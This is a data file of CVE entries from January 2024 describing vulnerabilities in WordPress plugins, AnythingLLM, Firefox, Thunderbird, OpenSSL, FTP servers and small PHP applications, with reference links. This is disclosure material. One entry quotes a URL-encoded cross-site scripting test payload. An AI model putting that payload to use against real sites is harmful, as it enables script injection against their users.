CVE    2024    768    Candidate    The Envo's Elementor Templates & Widgets for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to and including 1.4.4. This is due to missing or incorrect nonce validation on the ajax_theme_activation function. This makes it possible for unauthenticated attackers to activate arbitrary installed themes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/browser/envo-elementor-for-woocommerce/trunk/includes/admin/include/template-library.php#L367   |   URL:https://plugins.trac.wordpress.org/browser/envo-elementor-for-woocommerce/trunk/includes/admin/include/template-library.php#L367   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6504ae5c-a36d-495e-aa93-40a3753857c6?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6504ae5c-a36d-495e-aa93-40a3753857c6?source=cve    Assigned (20240119)
CVE    2024    767    Candidate    The Envo's Elementor Templates & Widgets for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.4.4. This is due to missing or incorrect nonce validation on the ajax_plugin_activation function. This makes it possible for unauthenticated attackers to activate arbitrary installed plugins via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/browser/envo-elementor-for-woocommerce/trunk/includes/admin/include/template-library.php#L332   |   URL:https://plugins.trac.wordpress.org/browser/envo-elementor-for-woocommerce/trunk/includes/admin/include/template-library.php#L332   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/cca71257-05dc-43d5-8de6-faf0a2feab2e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/cca71257-05dc-43d5-8de6-faf0a2feab2e?source=cve    Assigned (20240119)
CVE    2024    766    Candidate    The Envo's Elementor Templates & Widgets for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the templates_ajax_request function in all versions up to, and including, 1.4.4. This makes it possible for subscribers and higher to create templates.    MISC:https://plugins.trac.wordpress.org/browser/envo-elementor-for-woocommerce/trunk/includes/admin/include/template-library.php   |   URL:https://plugins.trac.wordpress.org/browser/envo-elementor-for-woocommerce/trunk/includes/admin/include/template-library.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/996c7433-dd82-4216-86b9-005f43c06c3a?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/996c7433-dd82-4216-86b9-005f43c06c3a?source=cve    Assigned (20240119)
CVE    2024    765    Candidate    As a default user on a multi-user instance of AnythingLLM, you could execute a call to the `/export-data` endpoint of the system and then unzip and read that export that would enable you to exfiltrate data of the system at that save state. This would require the attacker to be granted explicit access to the system, but they can do this at any role. Additionally, post-download, the data is deleted so no evidence would exist that the exfiltration occurred.    MISC:https://github.com/mintplex-labs/anything-llm/commit/08d33cfd8fc47c5052b6ea29597c964a9da641e2   |   URL:https://github.com/mintplex-labs/anything-llm/commit/08d33cfd8fc47c5052b6ea29597c964a9da641e2   |   MISC:https://huntr.com/bounties/8978ab27-710c-44ce-bfd8-a2ea416dc786   |   URL:https://huntr.com/bounties/8978ab27-710c-44ce-bfd8-a2ea416dc786    Assigned (20240119)
CVE    2024    763    Candidate    Any user can delete an arbitrary folder (recursively) on a remote server due to bad input sanitization leading to path traversal. The attacker would need access to the server at some privilege level since this endpoint is protected and requires authorization.    MISC:https://github.com/mintplex-labs/anything-llm/commit/8a7324d0e77a15186e1ad5e5119fca4fb224c39c   |   URL:https://github.com/mintplex-labs/anything-llm/commit/8a7324d0e77a15186e1ad5e5119fca4fb224c39c   |   MISC:https://huntr.com/bounties/25a2f487-5a9c-4c7f-a2d3-b0527db73ea5   |   URL:https://huntr.com/bounties/25a2f487-5a9c-4c7f-a2d3-b0527db73ea5    Assigned (20240119)
CVE    2024    761    Candidate    The File Manager plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.2.1 due to insufficient randomness in the backup filenames, which use a timestamp plus 4 random digits. This makes it possible for unauthenticated attackers to extract sensitive data including site backups in configurations where the .htaccess file in the directory does not block access.    MISC:https://plugins.trac.wordpress.org/changeset/3023403/wp-file-manager/trunk/file_folder_manager.php?old=2984933&old_path=wp-file-manager%2Ftrunk%2Ffile_folder_manager.php   |   URL:https://plugins.trac.wordpress.org/changeset/3023403/wp-file-manager/trunk/file_folder_manager.php?old=2984933&old_path=wp-file-manager%2Ftrunk%2Ffile_folder_manager.php   |   MISC:https://wordpress.org/plugins/wp-file-manager/   |   URL:https://wordpress.org/plugins/wp-file-manager/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1928f8e4-8bbe-4a3f-8284-aa12ca2f5176?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1928f8e4-8bbe-4a3f-8284-aa12ca2f5176?source=cve    Assigned (20240119)
CVE    2024    759    Candidate    Should an instance of AnythingLLM be hosted on an internal network and the attacker be explicitly granted a permission level of manager or admin, they could link-scrape internally resolving IPs of other services that are on the same network as AnythingLLM. This would require the attacker also be able to guess these internal IPs as `/*` ranging is not possible, but could be brute forced. There is a duty of care that other services on the same network would not be fully open and accessible via a simple CuRL with zero authentication as it is not possible to set headers or access via the link collector.    MISC:https://github.com/mintplex-labs/anything-llm/commit/0db6c3b2aa1787a7054ffdaba975474f122c20eb   |   URL:https://github.com/mintplex-labs/anything-llm/commit/0db6c3b2aa1787a7054ffdaba975474f122c20eb   |   MISC:https://huntr.com/bounties/9a978edd-ac94-41fc-8e3e-c35441bdd12b   |   URL:https://huntr.com/bounties/9a978edd-ac94-41fc-8e3e-c35441bdd12b    Assigned (20240119)
CVE    2024    758    Candidate    MolecularFaces before 0.3.0 is vulnerable to cross site scripting. A remote attacker can execute arbitrary JavaScript in the context of a victim browser via crafted molfiles.    MISC:https://github.com/advisories/GHSA-2pwh-52h7-7j84   |   URL:https://github.com/advisories/GHSA-2pwh-52h7-7j84   |   MISC:https://github.com/ipb-halle/MolecularFaces/security/advisories/GHSA-2pwh-52h7-7j84   |   URL:https://github.com/ipb-halle/MolecularFaces/security/advisories/GHSA-2pwh-52h7-7j84   |   MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-2pwh-52h7-7j84   |   URL:https://vulncheck.com/advisories/vc-advisory-GHSA-2pwh-52h7-7j84    Assigned (20240119)
CVE    2024    755    Candidate    Memory safety bugs present in Firefox 121, Firefox ESR 115.6, and Thunderbird 115.6. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.    MISC:Memory safety bugs fixed in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7   |   URL:https://bugzilla.mozilla.org/buglist.cgi?bug_id=1868456%2C1871445%2C1873701   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-02/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-02/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-04/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-04/   |   MLIST:[debian-lts-announce] 20240125 [SECURITY] [DLA 3720-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html   |   MLIST:[debian-lts-announce] 20240131 [SECURITY] [DLA 3727-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html    Assigned (20240119)
CVE    2024    754    Candidate    Some WASM source files could have caused a crash when loaded in devtools. This vulnerability affects Firefox < 122.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1871605   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1871605   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-01/    Assigned (20240119)
CVE    2024    753    Candidate    In specific HSTS configurations an attacker could have bypassed HSTS on a subdomain. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1870262   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1870262   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-02/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-02/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-04/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-04/   |   MLIST:[debian-lts-announce] 20240125 [SECURITY] [DLA 3720-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html   |   MLIST:[debian-lts-announce] 20240131 [SECURITY] [DLA 3727-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html    Assigned (20240119)
CVE    2024    752    Candidate    A use-after-free crash could have occurred on macOS if a Firefox update were being applied on a very busy system. This could have resulted in an exploitable crash. This vulnerability affects Firefox < 122.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1866840   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1866840   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-01/    Assigned (20240119)
CVE    2024    751    Candidate    A malicious devtools extension could have been used to escalate privileges. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1865689   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1865689   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-02/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-02/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-04/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-04/   |   MLIST:[debian-lts-announce] 20240125 [SECURITY] [DLA 3720-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html   |   MLIST:[debian-lts-announce] 20240131 [SECURITY] [DLA 3727-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html    Assigned (20240119)
CVE    2024    750    Candidate    A bug in popup notifications delay calculation could have made it possible for an attacker to trick a user into granting permissions. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1863083   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1863083   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-02/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-02/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-04/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-04/   |   MLIST:[debian-lts-announce] 20240125 [SECURITY] [DLA 3720-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html   |   MLIST:[debian-lts-announce] 20240131 [SECURITY] [DLA 3727-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html    Assigned (20240119)
CVE    2024    749    Candidate    A phishing site could have repurposed an `about:` dialog to show phishing content with an incorrect origin in the address bar. This vulnerability affects Firefox < 122 and Thunderbird < 115.7.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1813463   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1813463   |   MISC:https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html   |   MISC:https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-04/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-04/    Assigned (20240119)
CVE    2024    748    Candidate    A compromised content process could have updated the document URI. This could have allowed an attacker to set an arbitrary URI in the address bar or history. This vulnerability affects Firefox < 122.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1783504   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1783504   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-01/    Assigned (20240119)
CVE    2024    747    Candidate    When a parent page loaded a child in an iframe with `unsafe-inline`, the parent Content Security Policy could have overridden the child Content Security Policy. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1764343   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1764343   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-02/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-02/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-04/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-04/   |   MLIST:[debian-lts-announce] 20240125 [SECURITY] [DLA 3720-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html   |   MLIST:[debian-lts-announce] 20240131 [SECURITY] [DLA 3727-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html    Assigned (20240119)
CVE    2024    746    Candidate    A Linux user opening the print preview dialog could have caused the browser to crash. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1660223   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1660223   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-02/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-02/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-04/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-04/   |   MLIST:[debian-lts-announce] 20240125 [SECURITY] [DLA 3720-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html   |   MLIST:[debian-lts-announce] 20240131 [SECURITY] [DLA 3727-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html    Assigned (20240119)
CVE    2024    745    Candidate    The WebAudio `OscillatorNode` object was susceptible to a stack buffer overflow. This could have led to a potentially exploitable crash. This vulnerability affects Firefox < 122.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1871838   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1871838   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-01/    Assigned (20240119)
CVE    2024    744    Candidate    In some circumstances, JIT compiled code could have dereferenced a wild pointer value. This could have led to an exploitable crash. This vulnerability affects Firefox < 122.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1871089   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1871089   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-01/    Assigned (20240119)
CVE    2024    743    Candidate    An unchecked return value in TLS handshake code could have caused a potentially exploitable crash. This vulnerability affects Firefox < 122, Firefox ESR < 115.9, and Thunderbird < 115.9.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1867408   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1867408   |   MISC:https://lists.debian.org/debian-lts-announce/2024/03/msg00010.html   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00010.html   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-13/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-13/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-14/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-14/   |   MLIST:[debian-lts-announce] 20240323 [SECURITY] [DLA 3769-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00022.html   |   MLIST:[debian-lts-announce] 20240325 [SECURITY] [DLA 3775-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00028.html    Assigned (20240119)
CVE    2024    742    Candidate    It was possible for certain browser prompts and dialogs to be activated or dismissed unintentionally by the user due to an incorrect timestamp used to prevent input after page load. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1867152   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1867152   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-02/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-02/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-04/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-04/   |   MLIST:[debian-lts-announce] 20240125 [SECURITY] [DLA 3720-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html   |   MLIST:[debian-lts-announce] 20240131 [SECURITY] [DLA 3727-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html    Assigned (20240119)
CVE    2024    741    Candidate    An out of bounds write in ANGLE could have allowed an attacker to corrupt memory leading to a potentially exploitable crash. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1864587   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1864587   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-01/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-02/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-02/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-04/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-04/   |   MLIST:[debian-lts-announce] 20240125 [SECURITY] [DLA 3720-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html   |   MLIST:[debian-lts-announce] 20240131 [SECURITY] [DLA 3727-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html    Assigned (20240119)
CVE    2024    739    Candidate    A vulnerability, which was classified as critical, was found in Hecheng Leadshop up to 1.4.20. Affected is an unknown function of the file /web/leadshop.php. The manipulation of the argument install leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251562 is the identifier assigned to this vulnerability.    MISC:https://note.zhaoj.in/share/vLswXhWxUrs8   |   URL:https://note.zhaoj.in/share/vLswXhWxUrs8   |   MISC:https://vuldb.com/?ctiid.251562   |   URL:https://vuldb.com/?ctiid.251562   |   MISC:https://vuldb.com/?id.251562   |   URL:https://vuldb.com/?id.251562    Assigned (20240119)
CVE    2024    738    Candidate    A vulnerability, which was classified as critical, has been found in 个人开源 mldong 1.0. This issue affects the function ExpressionEngine of the file com/mldong/modules/wf/engine/model/DecisionModel.java. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251561 was assigned to this vulnerability.    MISC:https://github.com/biantaibao/mldong_RCE/blob/main/RCE.md   |   URL:https://github.com/biantaibao/mldong_RCE/blob/main/RCE.md   |   MISC:https://vuldb.com/?ctiid.251561   |   URL:https://vuldb.com/?ctiid.251561   |   MISC:https://vuldb.com/?id.251561   |   URL:https://vuldb.com/?id.251561    Assigned (20240119)
CVE    2024    737    Candidate    A vulnerability classified as problematic was found in Xlightftpd Xlight FTP Server 1.1. This vulnerability affects unknown code of the component Login. The manipulation of the argument user leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251560.    MISC:https://packetstormsecurity.com/files/176553/LightFTP-1.1-Denial-Of-Service.html   |   URL:https://packetstormsecurity.com/files/176553/LightFTP-1.1-Denial-Of-Service.html   |   MISC:https://vuldb.com/?ctiid.251560   |   URL:https://vuldb.com/?ctiid.251560   |   MISC:https://vuldb.com/?id.251560   |   URL:https://vuldb.com/?id.251560    Assigned (20240119)
CVE    2024    736    Candidate    A vulnerability classified as problematic has been found in EFS Easy File Sharing FTP 3.6. This affects an unknown part of the component Login. The manipulation of the argument password leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251559.    MISC:https://0day.today/exploit/39249   |   URL:https://0day.today/exploit/39249   |   MISC:https://vuldb.com/?ctiid.251559   |   URL:https://vuldb.com/?ctiid.251559   |   MISC:https://vuldb.com/?id.251559   |   URL:https://vuldb.com/?id.251559    Assigned (20240119)
CVE    2024    735    Candidate    A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as critical. Affected by this issue is the function exec of the file admin/operations/expense.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251558 is the identifier assigned to this vulnerability.    MISC:https://blog.csdn.net/DMZNX/article/details/135683738   |   URL:https://blog.csdn.net/DMZNX/article/details/135683738   |   MISC:https://vuldb.com/?ctiid.251558   |   URL:https://vuldb.com/?ctiid.251558   |   MISC:https://vuldb.com/?id.251558   |   URL:https://vuldb.com/?id.251558    Assigned (20240119)
CVE    2024    734    Candidate    A vulnerability was found in Smsot up to 2.12. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /get.php. The manipulation of the argument tid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251557 was assigned to this vulnerability.    MISC:https://note.zhaoj.in/share/vo1KOw3EYmBK   |   URL:https://note.zhaoj.in/share/vo1KOw3EYmBK   |   MISC:https://vuldb.com/?ctiid.251557   |   URL:https://vuldb.com/?ctiid.251557   |   MISC:https://vuldb.com/?id.251557   |   URL:https://vuldb.com/?id.251557    Assigned (20240119)
CVE    2024    733    Candidate    A vulnerability was found in Smsot up to 2.12. It has been classified as critical. Affected is an unknown function of the file /api.php of the component HTTP POST Request Handler. The manipulation of the argument data[sign] leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251556.    MISC:https://note.zhaoj.in/share/3GznRo9vWRJ8   |   URL:https://note.zhaoj.in/share/3GznRo9vWRJ8   |   MISC:https://vuldb.com/?ctiid.251556   |   URL:https://vuldb.com/?ctiid.251556   |   MISC:https://vuldb.com/?id.251556   |   URL:https://vuldb.com/?id.251556    Assigned (20240119)
CVE    2024    732    Candidate    A vulnerability was found in PCMan FTP Server 2.0.7 and classified as problematic. This issue affects some unknown processing of the component STOR Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251555.    MISC:https://fitoxs.com/vuldb/02-PCMan%20v2.0.7-exploit.txt   |   URL:https://fitoxs.com/vuldb/02-PCMan%20v2.0.7-exploit.txt   |   MISC:https://vuldb.com/?ctiid.251555   |   URL:https://vuldb.com/?ctiid.251555   |   MISC:https://vuldb.com/?id.251555   |   URL:https://vuldb.com/?id.251555    Assigned (20240119)
CVE    2024    731    Candidate    A vulnerability has been found in PCMan FTP Server 2.0.7 and classified as problematic. This vulnerability affects unknown code of the component PUT Command Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251554 is the identifier assigned to this vulnerability.    MISC:https://fitoxs.com/vuldb/01-PCMan%20v2.0.7-exploit.txt   |   URL:https://fitoxs.com/vuldb/01-PCMan%20v2.0.7-exploit.txt   |   MISC:https://vuldb.com/?ctiid.251554   |   URL:https://vuldb.com/?ctiid.251554   |   MISC:https://vuldb.com/?id.251554   |   URL:https://vuldb.com/?id.251554    Assigned (20240119)
CVE    2024    730    Candidate    A vulnerability, which was classified as critical, was found in Project Worlds Online Time Table Generator 1.0. This affects an unknown part of the file course_ajax.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251553 was assigned to this vulnerability.    MISC:https://torada.notion.site/SQL-injection-at-course_ajax-php-485d8cca5f8c43dfb1f76c7336a4a45e   |   URL:https://torada.notion.site/SQL-injection-at-course_ajax-php-485d8cca5f8c43dfb1f76c7336a4a45e   |   MISC:https://vuldb.com/?ctiid.251553   |   URL:https://vuldb.com/?ctiid.251553   |   MISC:https://vuldb.com/?id.251553   |   URL:https://vuldb.com/?id.251553    Assigned (20240119)
CVE    2024    729    Candidate    A vulnerability, which was classified as critical, has been found in ForU CMS up to 2020-06-23. Affected by this issue is some unknown functionality of the file cms_admin.php. The manipulation of the argument a_name leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251552.    MISC:https://github.com/mi2acle/forucmsvuln/blob/master/LFI.md   |   URL:https://github.com/mi2acle/forucmsvuln/blob/master/LFI.md   |   MISC:https://vuldb.com/?ctiid.251552   |   URL:https://vuldb.com/?ctiid.251552   |   MISC:https://vuldb.com/?id.251552   |   URL:https://vuldb.com/?id.251552    Assigned (20240119)
CVE    2024    728    Candidate    A vulnerability classified as problematic was found in ForU CMS up to 2020-06-23. Affected by this vulnerability is an unknown functionality of the file channel.php. The manipulation of the argument c_cmodel leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251551.    MISC:https://github.com/mi2acle/forucmsvuln/blob/master/LFI.md   |   URL:https://github.com/mi2acle/forucmsvuln/blob/master/LFI.md   |   MISC:https://vuldb.com/?ctiid.251551   |   URL:https://vuldb.com/?ctiid.251551   |   MISC:https://vuldb.com/?id.251551   |   URL:https://vuldb.com/?id.251551    Assigned (20240119)
CVE    2024    727    Candidate    Issue summary: Processing a maliciously formatted PKCS12 file may lead OpenSSL to crash, leading to a potential Denial of Service attack. Impact summary: Applications loading files in the PKCS12 format from untrusted sources might terminate abruptly. A file in PKCS12 format can contain certificates and keys and may come from an untrusted source. The PKCS12 specification allows certain fields to be NULL, but OpenSSL does not correctly check for this case. This can lead to a NULL pointer dereference that results in OpenSSL crashing. If an application processes PKCS12 files from an untrusted source using the OpenSSL APIs then that application will be vulnerable to this issue. OpenSSL APIs that are vulnerable to this are: PKCS12_parse(), PKCS12_unpack_p7data(), PKCS12_unpack_p7encdata(), PKCS12_unpack_authsafes() and PKCS12_newpass(). We have also fixed a similar issue in SMIME_write_PKCS7(). However, since this function is related to writing data, we do not consider it security significant. The FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue.    CONFIRM:https://security.netapp.com/advisory/ntap-20240208-0006/   |   MISC:1.0.2zj git commit   |   URL:https://github.openssl.org/openssl/extended-releases/commit/aebaa5883e31122b404e450732dc833dc9dee539   |   MISC:1.1.1x git commit   |   URL:https://github.openssl.org/openssl/extended-releases/commit/03b3941d60c4bce58fab69a0c22377ab439bc0e8   |   MISC:3.0.13 git commit   |   URL:https://github.com/openssl/openssl/commit/09df4395b5071217b76dc7d3d2e630eb8c5a79c2   |   MISC:3.1.5 git commit   |   URL:https://github.com/openssl/openssl/commit/d135eeab8a5dbf72b3da5240bab9ddb7678dbd2c   |   MISC:3.2.1 git commit   |   URL:https://github.com/openssl/openssl/commit/775acfdbd0c6af9ac855f34969cdab0c0c90844a   |   MISC:OpenSSL Advisory   |   URL:https://www.openssl.org/news/secadv/20240125.txt    Assigned (20240119)
CVE    2024    726    Candidate    A vulnerability was found in Project Worlds Student Project Allocation System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file admin_login.php of the component Admin Login Module. The manipulation of the argument msg with the input test%22%3Cscript%3Ealert(%27Torada%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251549 was assigned to this vulnerability.    MISC:https://torada.notion.site/Reflected-Cross-site-scripting-at-Project-Allocation-System-d94c7c489c2d48efa23b21a90dd0e03f?pvs=4   |   URL:https://torada.notion.site/Reflected-Cross-site-scripting-at-Project-Allocation-System-d94c7c489c2d48efa23b21a90dd0e03f?pvs=4   |   MISC:https://vuldb.com/?ctiid.251549   |   URL:https://vuldb.com/?ctiid.251549   |   MISC:https://vuldb.com/?id.251549   |   URL:https://vuldb.com/?id.251549    Assigned (20240119)
CVE    2024    725    Candidate    A vulnerability was found in ProSSHD 1.2 on Windows. It has been declared as problematic. This vulnerability affects unknown code. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251548.    MISC:https://packetstormsecurity.com/files/176544/ProSSHD-1.2-20090726-Denial-Of-Service.html   |   URL:https://packetstormsecurity.com/files/176544/ProSSHD-1.2-20090726-Denial-Of-Service.html   |   MISC:https://vuldb.com/?ctiid.251548   |   URL:https://vuldb.com/?ctiid.251548   |   MISC:https://vuldb.com/?id.251548   |   URL:https://vuldb.com/?id.251548    Assigned (20240119)
